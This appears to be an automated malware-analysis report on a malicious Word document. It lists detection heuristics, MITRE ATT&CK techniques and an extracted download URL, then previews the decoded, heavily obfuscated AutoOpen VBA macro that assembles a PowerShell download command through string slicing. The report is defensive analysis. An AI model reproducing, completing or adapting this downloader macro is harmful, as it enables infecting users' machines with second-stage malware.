MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute external code. The script appears to be obfuscated but contains concatenated strings that likely form a URL for downloading a second-stage payload. The presence of the Shell() call and the suspicious URL strongly suggest a downloader or droppper functionality.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://kmIopvTNE5CQUOVsWSCfrCItASpro.org/Qnr4n6rsfqvsE4N5a6Uf9iROdMLs In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 139770 bytes |
SHA-256: 6c2818ac3c97d0bf3f3fbfc05f36b9eca89dfed7111ded07baa4be9ef241f9d2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LiJXDYFmci" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function BkRtLA() On Error Resume Next SoERVmhwbH = (naHhVp - CDbl(271727) + jfUXTsfjJs + Fix(UZSsKOmUS / CLng(805001 * Sqr(DlXnPKEjWh))) - 360356 / Sin(aErnVvVMmmc - OHhruQtvBX - 430180 + CLng(fuzjDhazmLo)) * 294935 * Fix(271727)) hhkHzTirb = "wxGGUE0KjqwydZAWt7x7ss2b2Lowershell ((x'((Ax7u07yQTSswQ3ufDAuzeSyG" Bqijajn = Left(Right(hhkHzTirb, 40), 12) + Left(Right(hhkHzTirb, 27), 7) + CStr(Left(Right(hhkHzTirb, 7), 1)) + CStr(Left(Right(hhkHzTirb, 28), 1)) + Left(Right(hhkHzTirb, 47), 1) oSiYwEzRYkm = Chr(43) zNNZMAQmszz = "5BrTNfh4f = &AxzugFEtmcgvF0as2S9Dn7Ax7yfnsadasdXJa15wpiJZ" MtPbUiFwIN = Left(Right(zNNZMAQmszz, 22), 12) + CStr(Left(Right(zNNZMAQmszz, 48), 6)) + Left(Right(zNNZMAQmszz, 23), 1) IbuGzdttC = "l'3" BojKFG = CStr(Left(Right(IbuGzdttC, 2), 1)) tKsqTwDa = Chr(43) RRBjO = "l'3" HZvjf = CStr(Left(Right(RRBjO, 2), 1)) EGHbGPv = Chr(43) YwYNjhkjZDi = (IzjCAsqbqqN - CDbl(511993) + kfooFkjHi + Fix(WiRcuXs / CLng(104647 * Sqr(pqPLttvwVic))) - 548578 / Sin(DilsdAtvioW - QmaBlXwT - 687102 + CLng(qAWQYmusJ)) * 296899 * Fix(511993)) wOwVLUWGq = "3c5Ax7Nfh4fsOLGAx7(nFEtm" OtwNBqkB = CStr(Left(Right(wOwVLUWGq, 9), 5)) + CStr(Left(Right(wOwVLUWGq, 21), 3)) PYSsTwJpdRn = Chr(43) jhiAGw = "3c5Bn7Nfh4fsOLGYAx77Nntmcgv" JYzHhzDLj = Left(Right(jhiAGw, 11), 6) + Left(Right(jhiAGw, 23), 3) IFhNoZq = Chr(43) YtzWDviL = "P5nAx7E27B3U" SXUIwHK = Left(Right(YtzWDviL, 10), 3) + Left(Right(YtzWDviL, 4), 1) JdzErHTq = Chr(43) zhXwOASfnQZ = "P5EAx77NTB3UHe'nh8sOq" VwFUt = CStr(Left(Right(zhXwOASfnQZ, 18), 5)) + CStr(Left(Right(zhXwOASfnQZ, 8), 2)) naMcdA = (rITdkAZqiq - CDbl(887545) + qzMDV + Fix(FiIEiDw / CLng(321012 * Sqr(IKFHc))) - 257525 / Sin(QQbTwoGOHZ - jKUBzzkE - 212506 + CLng(WushMEXZcqU)) * 125244 * Fix(887545)) DiwPnj = Chr(43) nAjSzTRKCN = "P5E'n7A2TB3x7RWnh8" dtPnWWkMJjC = CStr(Left(Right(nAjSzTRKCN, 15), 4)) + Left(Right(nAjSzTRKCN, 7), 2) pWVZMsji = Chr(43) pBsvacJ = "P5EAx7NATB3UHx7nh8sOq" GVPdRwDXizk = CStr(Left(Right(pBsvacJ, 18), 5)) + CStr(Left(Right(pBsvacJ, 8), 2)) ZqPzmnI = Chr(43) rLmkTi = "PAxz77E2T" iSTtLjli = Left(Right(rLmkTi, 8), 2) + Left(Right(rLmkTi, 4), 1) jWEBzX = Chr(43) LGznCKVU = "P5En7NA2TB3x7RWnh8" AJEYjpfh = CStr(Left(Right(LGznCKVU, 15), 4)) + Left(Right(LGznCKVU, 7), 2) cjQbTqzdjks = (nmcAQFciJRd - CDbl(618317) + ijXfrTLLZkF + Fix(voMPawVqP / CLng(116564 * Sqr(AOtRVHt))) - 498327 / Sin(lLCXsjTUl - YhTDhrE - 495944 + CLng(sMIMvndO)) * 99532 * Fix(618317)) ADEZfzM = Chr(43) rqkwUidYz = "P5Ax77E2'B3U" YCaRm = Left(Right(rqkwUidYz, 10), 3) + Left(Right(rqkwUidYz, 4), 1) NlCdzLmp = Chr(43) MnQWfvpwh = "P5Ez7'w-objUHRWnhAx7qtc2KFu" YUVjWBG = CStr(Left(Right(MnQWfvpwh, 22), 6)) + Left(Right(MnQWfvpwh, 10), 3) UoLEbEQ = Chr(43) jjqHqhmrWb = "P5EzAx7ecn3UHRWn7NsOqtc2" QabGzbHr = Left(Right(jjqHqhmrWb, 20), 6) + Left(Right(jjqHqhmrWb, 8), 2) aSmjlHhk = (iVzMiR - CDbl(782369) + FSNaJittYL + Fix(zkZoOV / CLng(70056 * Sqr(QwsPCwNuV))) - 894885 / Sin(MisjAzwz - fSvZtHav - 595541 + CLng(AltHbhNVw)) * 639108 * Fix(782369)) pbVoEIVjVz = Chr(43) RXauqEGujH = "P5n7AxE2TB7UHRW" iCGfSupjiQ = CStr(Left(Right(RXauqEGujH, 13), 4)) + CStr(Left(Right(RXauqEGujH, 5), 1)) qPUsTjSjwp = Chr(43) SiRXOjXuHGH = "P5Ez77E2TAx7Ntn7N) rqtc2KFuw8IjTandom'1vjIopvTNE5CQ" vYknzGhwtY = Left(Right(SiRXOjXuHGH, 42), 11) + Left(Right(SiRXOjXuHGH, 19), 6) IboIlSrsNd = Chr(43) iWQzG = (DKzzsDbMWYz - CDbl(108208) + dusKcmnJn + Fix(brmuJMvCj / CLng(384579 * Sqr(waJipRtAX))) - 244764 / Sin(lIuzTpIY - dLzFWjGNztP - 795479 + CLng(ToOiClN)) * 738810 * Fix(108208)) NrwmI = "P5Ez7';uyfYYHRWnh8sUAxc2KFuw8I" KjDCiHKh = CStr(Left(Right(NrwmI, 25), 7)) + Left(Right(NrwmI, 11), 3) OvwwEB = "7jP" LifMZts = Left(Right(OvwwEB, 3), 1) ZBqcSoCw = Chr(43) aiCcrroHPO = "P5Ez77Ax7 = .RW ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.